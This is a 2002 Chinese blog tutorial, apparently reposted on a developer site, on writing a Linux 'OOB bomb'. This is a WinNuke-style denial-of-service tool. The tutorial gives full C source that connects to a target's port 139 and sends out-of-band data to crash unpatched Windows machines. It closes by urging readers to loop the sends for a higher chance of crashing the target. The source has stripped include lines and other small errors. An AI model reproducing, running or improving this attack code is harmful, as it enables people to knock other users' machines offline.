linux下 OOB 炸弹的制作

这是一篇关于Linux下OOB(Out-of-Band)炸弹制作的文章,由mikespook于2002年12月8日撰写。文章详细介绍了如何在Linux环境中创建OOB炸弹,主要涉及Linux系统、结构体、套接字编程等技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

两年前的文章,拿过来充充门面。
——————————————————
linux下 OOB 炸弹的制作

( 作者:mikespook | 发布日期:2002-12-8 | 浏览次数:466 )

关键字:linux,OOB炸弹,网络编程
前言:
    本文章只是为了给广大和我一样的菜鸟一个指引。如果你是高手,或对编程毫无兴趣。建议请不要在此浪费时间。

    记得还是在上高中时,第一次接触了winnuck蓝屏炸弹。那时感觉非常神秘。后来才知道原来那时所谓的蓝屏炸弹就是 OOB 炸弹。
    首先让我们了解一下什么是 OOB 炸弹。OOB 炸弹,顾名思义就是向对方发送一个 OOB 消息,由于操作系统漏洞的缘故而造成异常错误(通常表现就是蓝屏,顾得名蓝屏炸弹)。当然这里的操作系统特指windows。
    下面就结合实力给大家介绍一个 OOB 炸弹的编制方法。下面这个程序我没有进行测试,原因有很多。主要是没有条件。我也不保证这是一个能用的版本,因为据我了解,MS早已经对这个漏洞进行了修复。今天的这个文章全当是纪念吧!让大家了解一下,原来炸弹不过如此(话虽然这么说但是能写出好炸弹的还是高人,比如最近闹得沸沸扬扬的SYN Flood)。
/*------------------------------oob_bomb.c-----------------------------------*/
/*gcc -O -o tcpscan scan.c*/
/* oob bomb */
/* mikespook */
/* 2002.5.21 */
#include
#include
#include
#include
#include

/* 这个函数是用来检查输入的参数是IP地址还是主机名 */
int correcthost(const char *host, struct sockaddr_in * sock);

main(int argc, int *argv[])
{
  /* 所要攻击的端口,一般 OOB 炸弹默认的是139端口 */
  int n_port;
  /* socket套接字 */
  int sock_id;
  /* 返回错误码 */
  int rtn_err;
  /* socket结构,建立连接、发送消息全靠它了 */  
  struct sockaddr_in remote_sock;
  /* 消息 */
  char *pc_msg;
  /* 处理命令行参数 */
  if(argc != 4){
    if(argc != 3){
      if(argc !=2){
        printf("Usage: oob_bomb [port] [message]/n");
        printf("Writen by mikespook/n");
        printf("mikespook@hotmail.com/tWith subject: report for bomb/n");
        exit(0);
      }else
        /* 如果没有输入端口号就用默认的139端口 */
        remote_sock.sin_port = htons(139);  
    }else
      /* 否则使用输入的端口 */
      remote_sock.sin_port = htons(atoi(argv[2]));
    pc_msg = ":-)";
  }else{
    remote_sock.sin_port = htons(atoi(argv[2]));
    pc_msg =(char *)argv[3];
  }

  rtn_err = correcthost((char *)argv[1], (struct sockaddr_in *)&remote_sock);
  if(rtn_err != 0)
    exit(1);

  remote_sock.sin_family = AF_INET;
  /* 建立一个socket套接口 */
  sock_id = socket(AF_INET, SOCK_STREAM, 0);
  if(sock_id < 0){
    perror("/nsocket");
    exit(2);
  }
  /* 当然要连接上才能继续了 */
  rtn_err = connect(sock_id, (struct sockaddr *)&remote_sock, sizeof(remote_sock));
  if(rtn_err < 0){
    perror("/nconnect");
    exit(3);
  }   
  /* 呵呵,送一个MSG_OOB消息,"Bomb..." */
  rtn_err = send(sock_id, pc_msg, strlen(pc_msg), MSG_OOB);
  if(rtn_err == -1){
    perror("/nsend");
    exit(4);
  }
  
  printf("OOB_Bomb Success!/n");
  close(sock_id);
  exit(0);
}
/* 这个函数我在上次的tcp connect扫描器的制作中有介绍,不多说了 */
int correcthost(const char *host, struct sockaddr_in *sock)
{
  struct hostent *struct_host;
  if(isdigit(*host))
    sock->sin_addr.s_addr = inet_addr(host);
  else{
    struct_host = gethostbyname(host);
    if(struct_host != NULL)
      bcopy(struct_host->h_addr, (char *)&sock->sin_addr, struct_host->h_length);
    else{
      printf("Get error with host name./n");
      return -1;
    }
  }
  return 0;
}

-------------------------------------------------------------------------------
最后补充一下,在发送MSG_OOB消息的时候一般的 OOB 炸弹会做一个循环,大量的发送 MSG_OOB 消息,以增加对方当机的可能性。原理我已经说了,改进就由你完成了。:)
由于我是菜鸟,或许有什么不对的地方。也可能一些细节我没有考虑到。如果你知道的话希望不惜指教。小弟感激不尽!!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值